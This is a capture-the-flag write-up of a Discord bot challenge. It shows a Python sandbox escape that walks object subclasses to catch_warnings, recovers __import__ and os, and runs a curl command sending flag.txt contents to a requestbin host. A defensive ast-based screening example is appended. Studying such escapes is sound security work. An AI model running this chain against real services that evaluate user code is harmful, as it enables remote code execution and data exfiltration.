Tags: discord python 

(full writeup at link)

Note that the line env = {'__builtins__': {}} removes all builtins from the environment our code is executed in:

to_compile = f'async def func():\n{textwrap.indent(body, "  ")}'
try:
   exec(to_compile, env)

Use ().__class__.__bases__[0].__subclasses__() to get a list of all classes that are still available, find catch_warnings among them, and go through its module's builtins to import os. Then send the flag as a cookie to requestbin (alternatively, you could just import something that opens the file and return that).

a = [i for i in ().__class__.__bases__[0].__subclasses__() if i.__name__ == "catch_warnings"][0]
b = a()._module.__builtins__
c = b['__import__']('os')
c.system('curl -X POST -d "flag=$(cat flag.txt)" http://requestbin.net/r/REQUEST')
Original writeup (https://nullpxl.com/post/hsctf6-jsoninfo-keithbot-alostcause/).
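
From the defender's side, emptying __builtins__ does not stop attribute traversal from a literal such as (). The sketch below is an added example, not code from the bot or the original writeup: it screens a submitted body with ast before it reaches exec(). The names screen, wrap, PAYLOAD and BENIGN are assumptions made for illustration, and a check like this is a screening layer in front of exec(), not a replacement for running untrusted code in an isolated process.

```python
import ast
import textwrap

# Constructed samples: the first two payload lines from the writeup above,
# and a harmless body of the kind an eval command is meant to run.
PAYLOAD = (
    'a = [i for i in ().__class__.__bases__[0].__subclasses__() '
    'if i.__name__ == "catch_warnings"][0]\n'
    'b = a()._module.__builtins__\n'
)
BENIGN = "x = 1 + 2\nreturn x * 2"


def wrap(body):
    # Same wrapping the bot applies before calling exec().
    return f'async def func():\n{textwrap.indent(body, "  ")}'


def screen(body):
    """Return sorted (body_line, reason) findings; an empty list means nothing was flagged."""
    try:
        tree = ast.parse(wrap(body))
    except SyntaxError as exc:
        return [((exc.lineno or 1) - 1, "syntax error")]
    findings = set()
    for node in ast.walk(tree):
        line = getattr(node, "lineno", 1) - 1  # undo the one-line wrapper offset
        if isinstance(node, ast.Attribute) and node.attr.startswith("_"):
            # Covers __class__, __bases__, __subclasses__, _module, __builtins__, ...
            findings.add((line, f"underscore attribute .{node.attr}"))
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.add((line, "import statement"))
        elif isinstance(node, ast.Name) and node.id.startswith("__"):
            findings.add((line, f"dunder name {node.id}"))
    return sorted(findings)


if __name__ == "__main__":
    for label, body in (("payload", PAYLOAD), ("benign", BENIGN)):
        result = screen(body)
        print(label, "REJECT" if result else "ALLOW")
        for line, reason in result:
            print(f"  line {line}: {reason}")
```
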